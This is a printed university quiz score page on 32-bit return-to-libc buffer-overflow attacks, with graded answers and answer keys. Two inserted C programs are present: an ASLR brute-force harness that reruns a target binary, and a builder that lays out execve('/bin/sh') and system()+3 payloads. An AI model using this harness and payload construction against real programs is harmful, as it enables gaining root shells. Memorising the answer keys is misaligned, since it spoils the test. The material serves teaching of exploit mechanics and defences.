10/26/24, 9:11 AM Return to libc
Return to libc. Total score: 90/150
The respondent's email ([email protected]) was recorded when this form was submitted.
After using the "-z noexecstack" option to compile a C program, a buffer-overflow attack is supposed to fail, but an attacker can still make it succeed. What could be the reason? (5/5)
    Stack address randomization is turned off
    The return address is replaced by an address of a function in libc
    Stack guard protection is turned off
In the function epilogue, the previous frame pointer, which is stored in the area below the return address, will be retrieved and assigned to the ebp register. However, when we overflow the return address, the previous frame pointer region is already modified, so after the function epilogue, ebp contains some arbitrary value. Does this matter? (5/5)
    Yes, the program will crash when it returns to the previous function
    It doesn't matter as the program will never return to the previous function
https://docs.google.com/forms/d/e/1FAIpQLSdcQMyaza6pZ4I5FuJPn4P4udqjBelLsKIMpL6bIqpgpDsQJA/viewscore?pli=1&pli=1&viewscore=AE0zAg… 1/9
Instead of jumping to the system() function, we would like to jump to the execve() function to execute "/bin/sh". Please describe how to do this. You are allowed to have zeros in your input (assume that memcpy() is used for memory copy, instead of strcpy()).
True/False grid (score per row):
    Find execve() address in libc: 5/5
    Export a shell variable with "/bin/sh" content: 5/5
    Find "/bin/sh" address on the stack: 5/5
    Find execve()'s frame pointer ebp: 0/5
    Place pointer to environment variables on the stack: 5/5
    Place address of execve()'s argument list on the stack: 5/5
    Place "/bin/sh" address on the stack: 5/5
    Overwrite return address with execve address: 5/5
    Overwrite previous frame pointer with execve()'s ebp: 5/5
Correct answer (True/False):
    Find execve()'s frame pointer ebp
Instead of jumping to the system() function, we would like to jump to the execve() function to execute "/bin/sh". You are allowed to have zeros in your input (assume that memcpy() is used for memory copy, instead of strcpy()). Assume we know execve()'s ebp. Where on the stack to put the following addresses?
Columns: ebp-4 | ebp+4 | ebp+8 | ebp+12 | ebp+16 (score per row)
    Pointer to the list of environment variables: 0/5
    Address of "/bin/sh": 0/5
    Pointer to execve()'s argument list: 0/5
Correct answers (ebp-4 | ebp+4 | ebp+8 | ebp+12 | ebp+16):
    Pointer to the list of environment variables
    Address of "/bin/sh"
    Pointer to execve()'s argument list
As we know, the system() function calls /bin/sh, which is a symbolic link to /bin/bash. Recent versions of bash will drop the privilege if it detects that the effective user ID and the real user ID are different. Assume that we still want to use system() in our Return-to-libc attack; please describe how you can overcome this challenge. You are allowed to have zeros in your input (assume that memcpy() is used for memory copy, instead of strcpy()).
True/False grid (score per row):
    Run system("/bin/zsh"): 5/5
    Run system("/bin/bash -p"): 5/5
    Call setuid(0) before running system(): 5/5
    Make /bin/sh point to /bin/zsh before running: 0/5
Correct answer (True/False):
    Make /bin/sh point to /bin/zsh before running
When launching the return-to-libc attack, instead of jumping to the beginning of the system() function, an attacker causes the program to jump to the first instruction right after the function prologue in the system() function. Please describe how the attacker should construct the input array. Function foo()'s stack frame is given below. Where to put the following addresses?
Columns: X+100 | X+104 | X+108 | X+132 | X+136 | X+140 (score per row)
    system()'s address + 3: 0/5
    exit()'s address: 0/5
    Address of "/bin/sh": 0/5
Correct answers (X+100 | X+104 | X+108 | X+132 | X+136 | X+140):
    system()'s address + 3
    exit()'s address
    Address of "/bin/sh"
Can address space layout randomization (ASLR) help defeat the return-to-libc attack?
True/False grid (score per row):
    ASLR randomizes the stack address: 5/5
    ASLR randomizes the heap address: 5/5
    ASLR can defeat a brute-force attack: 0/5
Correct answer (True/False):
    ASLR can defeat a brute-force attack
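Why ASLR alone does not stop a return-to-libc attack on 32-bit Linux: the stack gets only about 19 bits of randomisation (the figure the simulation below assumes), so running the vulnerable program over and over with a payload built for one guessed address succeeds after a few hundred thousand tries at most. The C harness below is an added example, not part of the quiz: it keeps running the target until one attempt succeeds, and carries a simulated target (a plain LCG standing in for the kernel's randomisation) so the loop can be exercised without a vulnerable binary. The target path, the rule that a successful attempt ends in exit(0) while a wrong guess dies with SIGSEGV, and the entropy figure are assumptions.

```c
/* Added example, not part of the quiz: brute-force harness for a return-to-libc
 * payload under stack ASLR. attempt_exec() drives a real target (assumed to be
 * ./stack, reading its payload file itself); attempt_sim() is a deterministic
 * stand-in so the loop can run without a vulnerable program. */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>

/* Keep calling attempt() until it reports success. Returns the 1-based number
 * of the successful try, or -1 once max_tries is exhausted. */
static long brute_force(int (*attempt)(void *), void *ctx, long max_tries)
{
    for (long i = 1; i <= max_tries; i++)
        if (attempt(ctx)) return i;
    return -1;
}

/* Real attempt: fork/exec the target (ctx is its argv, argv[0] = path).
 * A wrong guess of the randomised stack address returns into unmapped memory
 * and the child dies with SIGSEGV (WIFSIGNALED); success is counted only when
 * the child exits normally with status 0, i.e. the payload's final exit(0) ran
 * (assumption: the payload is built to end in exit(0)). */
static int attempt_exec(void *ctx)
{
    char **argv = ctx;
    int status;
    pid_t pid = fork();
    if (pid < 0) return 0;
    if (pid == 0) { execv(argv[0], argv); _exit(127); }
    if (waitpid(pid, &status, 0) < 0) return 0;
    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
}

/* Simulated target: each run picks one of 2^entropy_bits stack layouts and the
 * attack only works when it is the one the payload was built for. A fixed
 * seed keeps the run reproducible; the LCG is a stand-in, not cryptographic. */
struct sim { unsigned entropy_bits; unsigned long guessed; unsigned seed; };

static int attempt_sim(void *ctx)
{
    struct sim *s = ctx;
    s->seed = s->seed * 1103515245u + 12345u;
    unsigned long layout = (s->seed >> 8) & ((1ul << s->entropy_bits) - 1);
    return layout == s->guessed;
}

/* Tries needed against the simulated target, or -1 if max_tries runs out. */
static long tries_needed(unsigned entropy_bits, unsigned long guessed, unsigned seed, long max_tries)
{
    struct sim s = { entropy_bits, guessed, seed };
    return brute_force(attempt_sim, &s, max_tries);
}

int main(int argc, char **argv)
{
    if (argc > 1) {                              /* usage: ./harness ./stack */
        long n = brute_force(attempt_exec, argv + 1, 1L << 20);
        if (n > 0) printf("success after %ld tries\n", n);
        else printf("gave up after %ld tries\n", 1L << 20);
        return n > 0 ? 0 : 1;
    }
    printf("simulated 19-bit target: %ld tries\n", tries_needed(19, 0x1234, 1, 1L << 22));
    return 0;
}
```

Run it as ./harness ./stack to loop over a real (assumed) target, or with no arguments for the simulation. On x86-64 the stack and libc get far more bits of randomisation and the libc address itself would also have to be guessed, so this loop stops being practical there; an information leak replaces the guessing.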
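The two layout questions earlier on this page (returning to execve() with a known frame pointer, and returning to system()+3 past its prologue) come down to where each word sits relative to ebp or X. The C program below is an added example, not part of the quiz or of any lab code: it assembles the attacker's input with memcpy() (so zeros are allowed) for both layouts and reports the offsets. The libc addresses, the stack address the payload lands on (payload_addr), and foo()'s frame layout (saved ebp at X+100, return address at X+104, with V = X+132 as the fake frame pointer) are assumptions; "/bin/sh" is placed inside the payload rather than exported as a shell variable, which memcpy() permits. Two points it makes explicit: when control lands on execve()'s first instruction, the prologue rebuilds ebp from esp, so what the quiz calls execve()'s ebp is just R, the address of the return-address slot, and the saved-ebp value foo() leaves behind is never used; when control lands on system()+3, that prologue is skipped, so the attacker's fake ebp V is what system() uses to find its argument at [V+8] and its return address at [V+4].

```c
/* Added example, not part of the quiz: assemble the attacker's input for two
 * 32-bit return-to-libc layouts and report where every word lands. All
 * addresses are placeholders for what an attacker would read out of gdb on a
 * non-ASLR 32-bit target; the payload is only built here, never delivered. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PAYLOAD_LEN 256
static unsigned char payload[PAYLOAD_LEN];

/* 32-bit little-endian store/load. memcpy() keeps the embedded zero bytes that
 * a strcpy()-based copy would have stopped at. */
static void put32(unsigned char *buf, size_t off, uint32_t v)
{
    unsigned char b[4] = { (unsigned char)v, (unsigned char)(v >> 8),
                           (unsigned char)(v >> 16), (unsigned char)(v >> 24) };
    memcpy(buf + off, b, 4);
}
static uint32_t get32(const unsigned char *buf, size_t off)
{
    return (uint32_t)buf[off] | ((uint32_t)buf[off + 1] << 8)
         | ((uint32_t)buf[off + 2] << 16) | ((uint32_t)buf[off + 3] << 24);
}

/* Layout A: return to the FIRST instruction of execve(). Its prologue
 * (push ebp; mov ebp,esp) rebuilds ebp from esp, so the stale value that
 * foo()'s epilogue left in ebp is never used and the new ebp equals R, the
 * address of foo()'s return-address slot: [R+4] is execve()'s own return
 * address, [R+8] the path, [R+12] argv and [R+16] envp. argv and envp must be
 * absolute pointers, hence payload_addr: the stack address the payload lands on. */
struct execve_layout { size_t ret, retaddr, path, argv, envp, argv_list, envp_list, str; };

static struct execve_layout build_execve_payload(unsigned char *buf, size_t ret_off,
        uint32_t payload_addr, uint32_t execve_addr, uint32_t exit_addr)
{
    struct execve_layout l = { ret_off, ret_off + 4, ret_off + 8, ret_off + 12,
                               ret_off + 16, ret_off + 20, ret_off + 28, ret_off + 32 };
    memset(buf, 0x90, PAYLOAD_LEN);                    /* visible filler, never executed */
    memcpy(buf + l.str, "/bin/sh", 8);                 /* 8 bytes, NUL included          */
    put32(buf, l.argv_list, payload_addr + l.str);     /* argv[0] = "/bin/sh"            */
    put32(buf, l.argv_list + 4, 0);                    /* argv[1] = NULL                 */
    put32(buf, l.envp_list, 0);                        /* envp[0] = NULL                 */
    put32(buf, l.ret, execve_addr);                    /* foo() returns into execve()    */
    put32(buf, l.retaddr, exit_addr);                  /* [R+4]: taken if execve() fails */
    put32(buf, l.path, payload_addr + l.str);          /* [R+8]                          */
    put32(buf, l.argv, payload_addr + l.argv_list);    /* [R+12]                         */
    put32(buf, l.envp, payload_addr + l.envp_list);    /* [R+16]                         */
    return l;
}

/* Layout B: return to system()+3, just past "push ebp; mov ebp,esp" (1 + 2
 * bytes). Assumption: system() was built with a frame pointer and reads its
 * argument from [ebp+8]. The prologue is skipped, so ebp keeps whatever value
 * V foo()'s "leave" popped from the saved-ebp slot, and the attacker chooses
 * V. system() then takes its argument from [V+8] and its return address from
 * [V+4]. Offsets are from X, the start of foo()'s buffer, under an assumed
 * frame: saved ebp at X+100, return address at X+104. V = X+132 keeps those
 * two words above the stack region system() itself uses below X+108. */
struct system_layout { size_t saved_ebp, ret, fake_ebp, exit_slot, arg_slot, str; };

static struct system_layout build_system_skip_prologue(unsigned char *buf, uint32_t x,
        uint32_t system_addr, uint32_t exit_addr)
{
    struct system_layout l = { 100, 104, 132, 136, 140, 144 };
    memset(buf, 0x90, PAYLOAD_LEN);
    memcpy(buf + l.str, "/bin/sh", 8);
    put32(buf, l.saved_ebp, x + l.fake_ebp);   /* V: popped into ebp by foo's leave  */
    put32(buf, l.ret, system_addr + 3);        /* skip push ebp; mov ebp,esp         */
    put32(buf, l.exit_slot, exit_addr);        /* [V+4]: where system() returns      */
    put32(buf, l.arg_slot, x + l.str);         /* [V+8]: system()'s argument         */
    return l;
}

int main(void)
{
    struct execve_layout e = build_execve_payload(payload, 24, 0xbfffe000u, 0xb7ea3290u, 0xb7e5e9d0u);
    printf("execve(): ret@%zu exit@%zu path@%zu argv@%zu envp@%zu \"/bin/sh\"@%zu\n",
           e.ret, e.retaddr, e.path, e.argv, e.envp, e.str);
    struct system_layout s = build_system_skip_prologue(payload, 0xbfffe000u, 0xb7e48da0u, 0xb7e5e9d0u);
    printf("system()+3: saved-ebp@X+%zu ret@X+%zu exit@X+%zu arg@X+%zu\n",
           s.saved_ebp, s.ret, s.exit_slot, s.arg_slot);
    return 0;
}
```

The 0x90 filler is only a visible marker: nothing on this stack is executed, which is the whole reason the return addresses point into libc. On a real target payload_addr would come from gdb or a leaked pointer, and ASLR must be off for fixed addresses to hold; with zeros allowed, the argv array and the empty envp array can live inside the payload instead of in exported environment variables.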
Function foo() has a buffer overflow problem when copying your input to a buffer that is inside its stack frame. We would like to get it to return to a sequence of function calls: bar() ➙ bar() ➙ xyz(3, 5) ➙ exit(). Assuming we know their addresses, please describe how you would use the buffer overflow problem to construct the stack before letting foo() return. You should provide a stack diagram in your answer.
Columns: X+4 | X+8 | X+12 | X+16 | X+20 | X+24 (score per row)
    xyz()'s 1st argument = 3: 0/5
    xyz()'s 2nd argument = 5: 0/5
    1st bar()'s addr: 5/5
    2nd bar()'s addr: 5/5
    xyz()'s addr: 5/5
    exit()'s addr: 0/5
Correct answers (X+4 | X+8 | X+12 | X+16 | X+20 | X+24):
    xyz()'s 1st argument = 3
    xyz()'s 2nd argument = 5
    exit()'s addr
This form was created inside Hanoi University of Science.